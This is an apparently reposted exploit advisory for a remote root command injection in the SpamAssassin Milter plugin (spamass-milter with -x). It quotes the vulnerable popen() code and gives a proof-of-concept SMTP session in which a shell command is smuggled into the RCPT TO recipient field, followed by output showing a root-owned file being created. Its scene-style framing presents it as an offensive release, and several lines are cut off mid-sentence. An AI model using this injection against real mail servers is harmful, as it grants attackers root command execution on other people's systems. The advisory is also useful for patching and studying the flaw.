Apache Spamassassin Milter Plugin Remote Root Command Execution
简介:
Description: The Spamassassin Milter plugin suffers from a remote root command execution vulnerability.
Description: The Spamassassin Milter plugin suffers from a remote root command execution vulnerability. Full exploit details provided. |
Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the |
aka the postfix_joker advisory |
March 07 2010 // if you read this 10 years later you are definetly |
Greetz fly out to alex,andi,adize :D |
+++ KEEP IT ULTRA PRIV8 +++ |
SpamAssassin is a mail filter which attempts to identify spam using |
a variety of mechanisms including text analysis, Bayesian filtering, |
DNS blocklists, and collaborative filtering databases. |
SpamAssassin is a project of the Apache Software Foundation (ASF). |
What is Postfix? It is Wietse Venema's mailer that started life at IBM |
research as an alternative to the widely-used Sendmail program. |
Postfix attempts to be fast, easy to administer, and secure. |
The outside has a definite Sendmail-ish flavor, but the inside is |
A little plugin for the Sendmail Milter (Mail Filter) library |
that pipes all incoming mail (including things received by rmail/UUCP) |
through the SpamAssassin, a highly customizable SpamFilter. |
Remote Code Execution Vulnerability |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ |
The Spamassassin Milter Plugin can be tricked into executing any command |
as the root user remotely. |
If spamass-milter is run with the expand flag (-x option) it runs a |
popen() including the attacker supplied |
>From spamass-milter-0.3.1 (-latest) Line 820: |
// Gets called once for each recipient |
// stores the first recipient in the spamassassin object and |
// stores all addresses and the number thereof (some redundancy) |
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt) |
struct context *sctx = (struct context*)smfi_getpriv(ctx); |
SpamAssassin* assassin = sctx->assassin; |
debug(D_FUNC, "mlfi_envrcpt: enter"); |
/* open a pipe to sendmail so we can do address |
char *fmt="%s -bv /"%s/" 2>&1"; |
#if defined(HAVE_SNPRINTF) |
snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]); |
/* XXX possible buffer overflow here // is this a |
sprintf(buf, fmt, SENDMAIL, envrcpt[0]); |
debug(D_RCPT, "calling %s", buf); |
#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */ |
rv = pthread_mutex_lock(&popen_mutex); |
debug(D_ALWAYS, "Could not lock popen mutex: % |
debug(D_RCPT, "popen failed(%s). Will not |
expand aliases", strerror(errno)); |
assassin->expandedrcpt.push_back(envrcpt[0]); |
[1] the vulnerable popen() call. |
Remote Root Exploit PoC through postfix |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ |
220 ownthabox ESMTP Postfix (Ubuntu) |
rcpt to: root+:"|touch /tmp/foo" |
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo |
